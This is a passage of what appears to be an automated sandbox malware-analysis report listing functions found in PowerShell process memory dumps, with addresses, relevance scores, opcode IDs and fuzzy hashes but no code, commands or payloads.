                                                              • Instruction Fuzzy Hash: 0DE02635308B1087CB0837B8A40C2EE7A56EBC4764F04402EDB0A83381CF386805A3D9
                                                              Function 04B49558 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 342ea5c1a3491e83113dc1fdce505f5f61f21af082c9f5f20d83a637da713b7b
                                                              • Instruction ID: 307f0c9b1214b49ff251853b10b3a6e1a1ae9a329c941636ddcfc7c8c72bd527
                                                              • Opcode Fuzzy Hash: 342ea5c1a3491e83113dc1fdce505f5f61f21af082c9f5f20d83a637da713b7b
                                                              • Instruction Fuzzy Hash: 5FD0A7567412350B5E5472FE19006BBA5CFCEC54E5B5500F69B05E3343EC40EC0923F1
                                                              Function 04B4DCA0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f73d15010e7d8e4dde1e6d0d514ff68f7d8f2618d9921f68c79ceae5a2a0752
                                                              • Instruction ID: 023054b11608ab210f94d7c970a2fbe9a5acb0dbdbba5efcad6f9300f191420e
                                                              • Opcode Fuzzy Hash: 5f73d15010e7d8e4dde1e6d0d514ff68f7d8f2618d9921f68c79ceae5a2a0752
                                                              • Instruction Fuzzy Hash: B2E08C36700B14478225AA1EA80089FB6EEDEC96A1340442EE01A8B344DE64E80687D5
                                                              Function 04B4DCF0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                              • Instruction ID: 25fb9922e4b33db9f1a655698873a9b56d843215b36deebee56956406632b0c5
                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                              • Instruction Fuzzy Hash: 94E08631B00014978B089599D4504E9F7A9DBCC220F04887ED90AA7340EA32691696E1
                                                              Function 04B4C590 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 536b41b1b3cb60c593d33a8360c2860446f9f05faa9c85e2bb019dd4313ba801
                                                              • Instruction ID: c87f035f347daa5e063c6c1f85e5c4427adee102d4ee733323d689df5599a93a
                                                              • Opcode Fuzzy Hash: 536b41b1b3cb60c593d33a8360c2860446f9f05faa9c85e2bb019dd4313ba801
                                                              • Instruction Fuzzy Hash: 4CE086353057901F8315536CB8148AABBF1EAD52A1305006FE549C7252D9569C0A8795
                                                              Function 04B48739 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9a261d2345dd8943bee43145a8c6b2f4d648b74c73a9a1f0679442bfd5a666b
                                                              • Instruction ID: 92ab8925bec854484bdf9b174b96fe97958b540f26a3e8ef98c89d0380559fcd
                                                              • Opcode Fuzzy Hash: f9a261d2345dd8943bee43145a8c6b2f4d648b74c73a9a1f0679442bfd5a666b
                                                              • Instruction Fuzzy Hash: 1FE04F39905249CBCF09BBA4E81A4ED7F30EE15311F40009DEE5A52591EA712A8ADBC0
                                                              Function 04B48800 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83e9d62d5374edd089880ab10ffcab1eff836f25167b83be42b280496f36dcdf
                                                              • Instruction ID: c2b6a7bad53f450a035d9f0b3ea1526ef3934354beafc670fdb39dd9439790d0
                                                              • Opcode Fuzzy Hash: 83e9d62d5374edd089880ab10ffcab1eff836f25167b83be42b280496f36dcdf
                                                              • Instruction Fuzzy Hash: D7E0D8359082468BCB15EBE8E0064FDBFB0DF46211F00519EDD4997602D6311485DFC1
                                                              Function 04B4F860 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4ce3f65a183c71e5ef02200b65bb35ce7631972865dcc65167f75feb0917459
                                                              • Instruction ID: a9c6f8e8e907cbdc0acc17bbb19cdd35e96c08f03e2db3c1ec126126e3284f14
                                                              • Opcode Fuzzy Hash: f4ce3f65a183c71e5ef02200b65bb35ce7631972865dcc65167f75feb0917459
                                                              • Instruction Fuzzy Hash: 00E01270D4424AAF9740DFBC84515A9FFF4AB59200B1485A98958D7205E6329612CB80
                                                              Function 04B4C5A0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38cbe2847719fded116df28dc57aacb2268a9f9c31c76cad67327cd5cb4de79f
                                                              • Instruction ID: c21991452e9f88336097c71ae85049661ba44771292ebb9c031594efea6506b2
                                                              • Opcode Fuzzy Hash: 38cbe2847719fded116df28dc57aacb2268a9f9c31c76cad67327cd5cb4de79f
                                                              • Instruction Fuzzy Hash: A2D0A7353003101B4214635DB41489977EAE7C95A2300403FEA0DC3341DE21AC0683E4
                                                              Function 04B4F870 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                              • Instruction ID: 0a238f859b16a11055d27491eb47be4e2931677cd3dec2a5db809e39656bf657
                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                              • Instruction Fuzzy Hash: 1BD06270D04209DF8780EFADC94156DFBF4EB48210F5085AA8919E7301F7315612DBD1
                                                              Function 04B48748 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8851b86c61def27a9dfac04747a2f741cd40d343f4a330aa75f1ca718a081f2
                                                              • Instruction ID: 9686793ba74cb706f9fc2b4d5bd2ebad887699ef51158e6176ece79f88ae277f
                                                              • Opcode Fuzzy Hash: e8851b86c61def27a9dfac04747a2f741cd40d343f4a330aa75f1ca718a081f2
                                                              • Instruction Fuzzy Hash: 75D06735905209CBCF18ABA5E85A4FDBB74FB14301F4041ADED1752191EE313A5AEEC5
                                                              Function 04B48810 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 443c47a5d347ef6f8998de44c2169f5bab4de555cd5d53f6edd4d9317491d1fc
                                                              • Instruction ID: a8efa61e659b5d6ca88ac5e18e54efd42a0b242927b7cb0f50f68e343df6d1a4
                                                              • Opcode Fuzzy Hash: 443c47a5d347ef6f8998de44c2169f5bab4de555cd5d53f6edd4d9317491d1fc
                                                              • Instruction Fuzzy Hash: FAD01734A0820A8B8B18EFA4E44A9BEBBB5EB44201F008169ED4993340EA306805EBC1
                                                              Function 04B47928 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 923f9331dd729774e290688b0bc76a3bbfa3073bc93039baeaa586aabd04df0a
                                                              • Instruction ID: 087b0fd0f791c6021e46864e6549fe0228b6a130ddc6adcab48cd403d91b5939
                                                              • Opcode Fuzzy Hash: 923f9331dd729774e290688b0bc76a3bbfa3073bc93039baeaa586aabd04df0a
                                                              • Instruction Fuzzy Hash: 52B092300447088FC2486F75A404818732DAB4021538004A8E80E4BAA68E3AE885CA44
                                                              Function 04B47925 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd6022c1795b22783393245c2d06ea2207222a5948d4cec1812917975b582789
                                                              • Instruction ID: 87c6c58af8809820d97ef7651bac6b5099021f1e6f498db924908907587654ff
                                                              • Opcode Fuzzy Hash: dd6022c1795b22783393245c2d06ea2207222a5948d4cec1812917975b582789
                                                              • Instruction Fuzzy Hash: BFC09B30545386CFC7495F7095544197735AF4521531504DFE419569968A36D4C5CB05
                                                              Function 04B47E9C Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e31a50d920e71deb03bc200b3d22e56540bebb4c5cc04acca66731bf8a68f8a
                                                              • Instruction ID: ff436cedcfb96360cb066b1c6acdac16b8e842e89e248e689df1fc0d3d2e367f
                                                              • Opcode Fuzzy Hash: 0e31a50d920e71deb03bc200b3d22e56540bebb4c5cc04acca66731bf8a68f8a
                                                              • Instruction Fuzzy Hash: 4EA00236D111105FBE54D637559A55936F2B7C3319B0484D0AE02E4424DE38CCD2D641

                                                              Non-executed Functions

                                                              Function 079C3928 Relevance: 10.3, Strings: 8, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-2400798967
                                                              • Opcode ID: 03da31ca0eabdb2cc864bf43a30771ed909cd8d9d31b252e6c28074bd83159f2
                                                              • Instruction ID: 5cee738b34ac16134b231d88ec03169d765cfe177384b61c6c3015dd3cb07ef8
                                                              • Opcode Fuzzy Hash: 03da31ca0eabdb2cc864bf43a30771ed909cd8d9d31b252e6c28074bd83159f2
                                                              • Instruction Fuzzy Hash: F5A134B17042159FCF24DB69D81077ABBAAEFC6218F18C4AED905CB291CA31D855C7A3
                                                              Function 04B4EBB8 Relevance: 10.2, Strings: 8, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,nq$0oMp$$jq$$jq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-1653848937
                                                              • Opcode ID: 3b2f4170026420c1b251fc9cfca7db6d03fec65ce5b566eb4c32a980e95108cb
                                                              • Instruction ID: c6675cb819cdc18e9bae1aca8894dd6466cf1946f053879027d76e969ea544e4
                                                              • Opcode Fuzzy Hash: 3b2f4170026420c1b251fc9cfca7db6d03fec65ce5b566eb4c32a980e95108cb
                                                              • Instruction Fuzzy Hash: B8517C303845108FCB29AB79995492D3B9BBFC975131104EAE467DB3B2EE58EC40F762
                                                              Function 04B4EDE8 Relevance: 9.2, Strings: 7, Instructions: 453COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oMp$0oMp$0oMp$`Qjq$$jq$$jq$$jq
                                                              • API String ID: 0-3969061158
                                                              • Opcode ID: 1a251e38e1d516fb1b68e935f05a6796b21d6436709fe74833872a8178b33f50
                                                              • Instruction ID: e82da6bc484dfd4db2bd6bd984e6004b7fdca7a3c4a68a6d80b32873c8f89e24
                                                              • Opcode Fuzzy Hash: 1a251e38e1d516fb1b68e935f05a6796b21d6436709fe74833872a8178b33f50
                                                              • Instruction Fuzzy Hash: 24E1D3307502208FDB249B7D891463E77DBEFC9B10B2544EAD906DF3A5EE64EC0197A2
                                                              Function 04B47A13 Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 833a3a63b3a701d736a8d9913d710b754a74cb3e9510dd3e5521539475980c4c
                                                              • Instruction ID: 223bcc6553c733418442fd7e724e4f5a4766dd6ada4182f1939e58baf5cf4a6e
                                                              • Opcode Fuzzy Hash: 833a3a63b3a701d736a8d9913d710b754a74cb3e9510dd3e5521539475980c4c
                                                              • Instruction Fuzzy Hash: 86B18074E006099FDB54DFA9D980A9DFBF6FF88300F10862AD819AB355DB34A945CF90
                                                              Function 04B47A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 1f3242763ee302417c8c3a6cde4e33e3433662bc3aa5296da28643ba852f64ff
                                                              • Instruction ID: 6f8a715e93fbe5e1f78ab67e4976fe4e465301e7ab471d3684126d21e98b7c85
                                                              • Opcode Fuzzy Hash: 1f3242763ee302417c8c3a6cde4e33e3433662bc3aa5296da28643ba852f64ff
                                                              • Instruction Fuzzy Hash: DEB17074E007099FDB54DFA9D980A9DFBF6FF88300F10862AD819AB355DB34A945CB90
                                                              Function 079C3678 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                              • API String ID: 0-103809679
                                                              • Opcode ID: c410d8d264f44cb42a5a7dec7e03992dcef979cc694493133cbfbf4e607c9db2
                                                              • Instruction ID: 97a04bd8c69672db1a1f8777f9d556e9349c0c491d5bede5c616c3ffa6637d4e
                                                              • Opcode Fuzzy Hash: c410d8d264f44cb42a5a7dec7e03992dcef979cc694493133cbfbf4e607c9db2
                                                              • Instruction Fuzzy Hash: C35135B570430A9FCF25DA299911267FBBAAFC2218F24C46FD805CB391DA35C855C7A3
                                                              Function 079C2CA8 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq$tPjq$$jq$$jq$$jq
                                                              • API String ID: 0-3881469342
                                                              • Opcode ID: d38d6aa2b864bf708a061d38a66957ff486a55d45b43ab0908c33dc3aac04800
                                                              • Instruction ID: 7aa2b37acff33001360ac7d496dbe81e19b96a60245b1a0fd690d7b462417ca9
                                                              • Opcode Fuzzy Hash: d38d6aa2b864bf708a061d38a66957ff486a55d45b43ab0908c33dc3aac04800
                                                              • Instruction Fuzzy Hash: C63125763442158FDB15CB29D440A66BBA9FF96724F2485AFD804CB3A5CA31DC41C7A2
                                                              Function 079C1EF8 Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$84#l$tPjq$J&l$J&l
                                                              • API String ID: 0-2684265090
                                                              • Opcode ID: 8dfab4d5d0faee027cae5add760cefa8b8b45ff7fbc3fb1171e9119aebca3482
                                                              • Instruction ID: 7722913de257f19e20c669393f766820d118d0b50552de9d3d270b12b8bfd2ea
                                                              • Opcode Fuzzy Hash: 8dfab4d5d0faee027cae5add760cefa8b8b45ff7fbc3fb1171e9119aebca3482
                                                              • Instruction Fuzzy Hash: 88218DF1A4020ADBEF24CF458452A66F7BEFB81719F1880AEDA045B153C372D941C6A6
                                                              Function 04B47208 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `kq$`kq$`kq$`kq
                                                              • API String ID: 0-714213201
                                                              • Opcode ID: 06d4fe5bb909af392a76e7b6f6c8cdc4879ce1a6f498ab8ead6e5902b7222a6c
                                                              • Instruction ID: 190ebe2206c532c63e633fe553983e00af7c21b34345da5af5d6bae8b49b94e7
                                                              • Opcode Fuzzy Hash: 06d4fe5bb909af392a76e7b6f6c8cdc4879ce1a6f498ab8ead6e5902b7222a6c
                                                              • Instruction Fuzzy Hash: A7917174E016099FDB54CFA9D590A9DFBF1FF88300F20862AD819AB355EB34A945CF90
                                                              Function 079C5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$$jq$$jq
                                                              • API String ID: 0-2428501249
                                                              • Opcode ID: 7ca0132c817104e815db17fd19bef204469ce91d72ef0f55c3fc112896e91d9c
                                                              • Instruction ID: f89d6039ba815fa742a7da9e933a67537c2d8a8f53e275ddafd8f08e940fd208
                                                              • Opcode Fuzzy Hash: 7ca0132c817104e815db17fd19bef204469ce91d72ef0f55c3fc112896e91d9c
                                                              • Instruction Fuzzy Hash: F02177B13142069FDF34DA2A8901727B7DBABC1719F75843EA905CB381DDB5E860C362
                                                              Function 079C22E8 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$pij$J&l$J&l
                                                              • API String ID: 0-1627512543
                                                              • Opcode ID: c8c8d05aa2bd1ee5d7bc6ef26e577bf367ef6a99b91ba9cd6c4360d3ee6388b9
                                                              • Instruction ID: db5b53875b32f0bfbf0ebd6a96939d3a7fa3698ae52dd76ec03608cd16a373e7
                                                              • Opcode Fuzzy Hash: c8c8d05aa2bd1ee5d7bc6ef26e577bf367ef6a99b91ba9cd6c4360d3ee6388b9
                                                              • Instruction Fuzzy Hash: 9831DFB191430ADFDF25CF29C545666BBB8BB02B18F0884BED8548F161D739D984CBA3
                                                              Function 079C0308 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                              • API String ID: 0-1496060811
                                                              • Opcode ID: e260d1db1cdf5e8ac084fa4c42f69ae0a130b1c42a7295bed08a7d0f9f206143
                                                              • Instruction ID: b5042a44b1212b7e1fbf80f360ce9a06d4e50411875101c599e6c321013df61c
                                                              • Opcode Fuzzy Hash: e260d1db1cdf5e8ac084fa4c42f69ae0a130b1c42a7295bed08a7d0f9f206143
                                                              • Instruction Fuzzy Hash: 1601286174D3958FCB27822C5D201666FB69FC3524F1906EBC581DF292CD188D4A83A3

                                                              Executed Functions

                                                              Function 07B117B8 Relevance: .3, Instructions: 330COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7aee07786baf7087e63b7dc83b039a551ea5adc7681c5d3d4a14913b22a8afa4
                                                              • Instruction ID: a996b43ae9e435e7f3f943875da72128a7438ab96c39954297c8449bab6bd01f
                                                              • Opcode Fuzzy Hash: 7aee07786baf7087e63b7dc83b039a551ea5adc7681c5d3d4a14913b22a8afa4
                                                              • Instruction Fuzzy Hash: 01B145F2B0020E9FDB109B6CC4006ABBBE6EF85211F58C0BADA15CB251DA31CD52C7A1
                                                              Function 07B128E8 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf8bb7cb98c3438a4627f4e67ef74367ab18e655c4b63a96f02b5241d043949a
                                                              • Instruction ID: 19d2e8293da79d198d336bddedd253df4fc274f1750a547910fc848dfbf2b19c
                                                              • Opcode Fuzzy Hash: bf8bb7cb98c3438a4627f4e67ef74367ab18e655c4b63a96f02b5241d043949a
                                                              • Instruction Fuzzy Hash: 20516BB1B143498FE7219B6C88407AABBE5FFC6211F5040FAD605CB252DA35CD05C7B6
                                                              Function 07B1271F Relevance: .2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bb4b08e76820f51598639100aee04ca31d35e74efe8931821f3cf35ee8c41f4
                                                              • Instruction ID: e00edb741dd23deebbbc0073e5d03e49d9aac4424a751ac9a42250ea67901cdd
                                                              • Opcode Fuzzy Hash: 8bb4b08e76820f51598639100aee04ca31d35e74efe8931821f3cf35ee8c41f4
                                                              • Instruction Fuzzy Hash: 9C5149B2740206DFEB158F6884406EAB7E5FF85221F9480FAD905CF651DA35CD54C771
                                                              Function 033EF3D8 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 129d902a7e0c8fad6184f444b2b3e858013140004db190a8f5555de732af466e
                                                              • Instruction ID: 26e628e8d5827cfb83c87497333134226a57a4805b69f767206c6bcd86d44e8e
                                                              • Opcode Fuzzy Hash: 129d902a7e0c8fad6184f444b2b3e858013140004db190a8f5555de732af466e
                                                              • Instruction Fuzzy Hash: AF21F472508200EFCB05DF54D9C0B26BF69FB88314F24C5A9E9090A396C37AD496CFA1
                                                              Function 07B13DC4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6b80a2fbee127a5d17cd8f8fcb48f21fcacc09b3a3b010fb9e88ba324537212
                                                              • Instruction ID: 9b79c098cbf9776ebd476a417939eadb0db9bcb91557aedaa6e714bd5dbec54e
                                                              • Opcode Fuzzy Hash: c6b80a2fbee127a5d17cd8f8fcb48f21fcacc09b3a3b010fb9e88ba324537212
